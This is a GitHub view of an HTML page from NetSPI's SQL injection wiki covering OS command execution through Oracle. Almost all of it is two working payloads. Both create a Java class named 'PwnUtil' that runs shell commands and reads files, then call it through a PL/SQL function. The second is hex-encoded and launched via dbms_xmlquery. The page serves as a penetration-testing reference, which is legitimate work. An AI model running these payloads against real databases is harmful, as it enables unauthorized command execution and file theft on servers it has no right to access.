SQLInjectionWiki/attackQueries/executingOSCommands/oracle.html at master · NetSPI/SQLInjectionWiki · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<h3 id="executing-os-commands">Executing OS Commands Through Oracle</h3>

<p class="pageDescription">{{site.data.injectionDescriptions.executingOSCommands}}</p>

<p><a target="_blank" rel="noopener" href="http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql">Java</a> can be used to execute commands if it's installed.</p>
<table class="table table-striped table-hover">
  <thead>
    <tr>
      <th>Description</th>
      <th>Query</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Creating Java Classes</td>
      <td>
        /* create Java class */<br/> BEGIN
        <br/> EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String
        stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new
        FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';<br/> END;
        <br/> /
        <br/><br/> BEGIN

        <br/> EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';<br/> END;
        <br/> /
        <br/><br/> /* run OS command */<br/> SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;</td>
    </tr>
    <tr>
      <td>Creating Java Classes (Hex encoded)</td>
      <td>
        /* create Java class */<br/> SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
        <br/>EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b''));
        end;')) results FROM dual
        <br/><br/> /* run OS command */<br/> SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
      </td>
    </tr>
  </tbody>
</table>